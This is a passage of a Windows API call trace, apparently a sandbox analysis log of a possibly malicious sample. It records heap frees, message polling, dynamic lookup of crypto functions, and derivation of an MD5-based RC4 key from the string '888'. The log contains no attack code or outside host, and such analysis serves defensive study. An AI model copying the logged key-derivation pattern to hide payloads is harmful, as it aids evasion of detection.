dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0124.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0124.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0124.258] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0124.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0124.258] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f40, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0124.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0124.259] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6108 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0124.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0124.259] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0124.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0124.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.260] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0124.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.260] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0124.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.260] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0124.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.261] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0124.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.261] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.261] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0124.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.261] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0124.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.262] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0124.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.262] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0124.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.262] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0124.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.262] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0124.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.262] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.262] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.262] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0124.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.263] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0124.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa4f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0124.263] CryptCreateHash (in: hProv=0x9bf330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0124.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0124.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0124.263] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0124.263] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0124.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0124.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0124.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa498, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0124.264] CryptHashData (hHash=0x9a47c0, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0124.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.264] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0124.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0124.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa318, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0124.265] CryptDeriveKey (in: hProv=0x9bf330, Algid=0x6601, hBaseData=0x9a47c0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a43c0) returned 1 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.265] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.265] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0124.265] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.265] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0124.265] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0124.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0124.265] CryptDestroyHash (hHash=0x9a47c0) returned 1 [0124.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.266] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 